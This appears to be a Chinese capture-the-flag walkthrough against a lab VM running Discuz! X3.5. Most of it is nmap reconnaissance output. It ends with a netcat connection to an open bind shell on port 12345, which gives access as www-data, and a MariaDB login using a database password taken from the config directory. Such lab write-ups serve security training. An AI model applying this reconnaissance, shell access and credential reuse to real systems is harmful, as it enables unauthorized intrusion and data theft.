┌──(root㉿kali)-[~] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:13 CST Nmap scan report for 192.168.2.1 Host is up (0.0014s latency). MAC Address: 0A:00:27:00:00:0A (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.0011s latency). MAC Address: 08:00:27:10:EF:B6 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.69 Host is up (0.0016s latency). MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.02 seconds
靶机IP:192.168.2.69
2、端口扫描
1.全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿kali)-[~] └─# nmap --min-rate 10000 -p- 192.168.2.69 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:13 CST Nmap scan report for 192.168.2.69 Host is up (0.0013s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 47.83 seconds
┌──(root㉿kali)-[~] └─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.69 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:14 CST Nmap scan report for 192.168.2.69 Host is up (0.00085s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA) | 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA) |_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-server-header: Apache/2.4.62 (Debian) |_http-generator: Discuz! X3.5 | http-robots.txt: 20 disallowed entries (15 shown) | /api/ /data/ /source/ /install/ /template/default/ | /config/ /uc_client/ /uc_server/ /admin.php /search.php | /member.php /api.php /misc.php /connect.php |_/forum.php?mod=redirect* |_http-title: \xE8\xAE\xBA\xE5\x9D\x9B - Powered by Discuz! MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds
┌──(root㉿kali)-[~] └─# nmap --script=vuln -p22,80 192.168.2.69 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:18 CST Nmap scan report for 192.168.2.69 Host is up (0.0011s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.2.69 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.2.69:80/ | Form id: lsform | Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes | | Path: http://192.168.2.69:80/ | Form id: scbar_form | Form action: search.php?searchsubmit=yes | | Path: http://192.168.2.69:80/search.php?mod=forum&srchtxt=%E6%B4%BB%E5%8A%A8&formhash=a8c08364&searchsubmit=true&source=hotsearch | Form id: searchlogo | Form action: search.php?mod=forum | | Path: http://192.168.2.69:80/forum.php | Form id: lsform | Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes | | Path: http://192.168.2.69:80/forum.php | Form id: scbar_form | Form action: search.php?searchsubmit=yes | | Path: http://192.168.2.69:80/forum.php?showmobile=yes | Form id: lsform | Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes | | Path: http://192.168.2.69:80/forum.php?showmobile=yes | Form id: scbar_form | Form action: search.php?searchsubmit=yes | | Path: http://192.168.2.69:80/search.php?searchsubmit=yes | Form id: searchlogo | Form action: search.php?mod=forum | | Path: http://192.168.2.69:80/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes | Form id: scbar_form | Form action: search.php?searchsubmit=yes | | Path: http://192.168.2.69:80/search.php?mod=forum&srchtxt=discuz&formhash=a8c08364&searchsubmit=true&source=hotsearch | Form id: searchlogo | Form action: search.php?mod=forum | | Path: http://192.168.2.69:80/forum.php?mod=redirect&tid=1&goto=lastpost | Form id: lsform | Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes | | Path: http://192.168.2.69:80/forum.php?mod=redirect&tid=1&goto=lastpost | Form id: scbar_form | Form action: search.php?searchsubmit=yes | | Path: http://192.168.2.69:80/home.php?mod=space&username=admin | Form id: lsform | Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes | | Path: http://192.168.2.69:80/home.php?mod=space&username=admin | Form id: scbar_form | Form action: search.php?searchsubmit=yes | | Path: http://192.168.2.69:80/forum.php?mod=misc&action=showdarkroom | Form id: lsform | Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes | | Path: http://192.168.2.69:80/forum.php?mod=misc&action=showdarkroom | Form id: scbar_form | Form action: search.php?searchsubmit=yes | | Path: http://192.168.2.69:80/home.php?mod=space&do=friend&view=online&type=member | Form id: lsform | Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes | | Path: http://192.168.2.69:80/home.php?mod=space&do=friend&view=online&type=member | Form id: scbar_form | Form action: search.php?searchsubmit=yes | | Path: http://192.168.2.69:80/home.php?mod=space&username=admin | Form id: lsform | Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes | | Path: http://192.168.2.69:80/home.php?mod=space&username=admin | Form id: scbar_form | Form action: search.php?searchsubmit=yes | | Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2 | Form id: lsform | Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes | | Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2 | Form id: scbar_form | Form action: search.php?searchsubmit=yes | | Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2 | Form id: moderate | Form action: forum.php?mod=topicadmin&action=moderate&fid=2&infloat=yes&nopost=yes | | Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2 | Form id: fastpostform |_ Form action: forum.php?mod=post&action=newthread&fid=2&topicsubmit=yes&infloat=yes&handlekey=fastnewpost |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-cross-domain-policy: | VULNERABLE: | Cross-domain and Client Access policies. | State: VULNERABLE | A cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader, | etc. use to access data across different domains. A client acces policy file is similar to cross-domain policy | but is used for M$ Silverlight applications. Overly permissive configurations enables Cross-site Request | Forgery attacks, and may allow third parties to access sensitive data meant for the user. | Check results: | /crossdomain.xml: | | | | | | Extra information: | Trusted domains:* | | References: | http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html | http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html | https://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html | http://acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file | https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_%28OTG-CONFIG-008%29 |_ https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /admin.php: Possible admin folder | /robots.txt: Robots file |_ /crossdomain.xml: Adobe Flash crossdomain policy MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 58.26 seconds
┌──(root㉿kali)-[~] └─# nmap --min-rate 10000 -p- 192.168.2.69 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 16:06 CST Nmap scan report for chat.dsz (192.168.2.69) Host is up (0.00018s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 12345/tcp open netbus MAC Address: 08:00:27:E6:8D:F4 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 25.54 seconds
发现新开放了一个端口12345,服务为netbus
尝试直接进行连接
1 2 3 4
┌──(root㉿kali)-[~] └─# nc 192.168.2.69 12345 id uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Chat2:/var/www/html/config$ mysql -u discuz_user -p'StrongPassword!123' Welcome to the MariaDB monitor. Commands end with ; or \g. -p'StrongPassword!123' Your MariaDB connection id is 104 Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.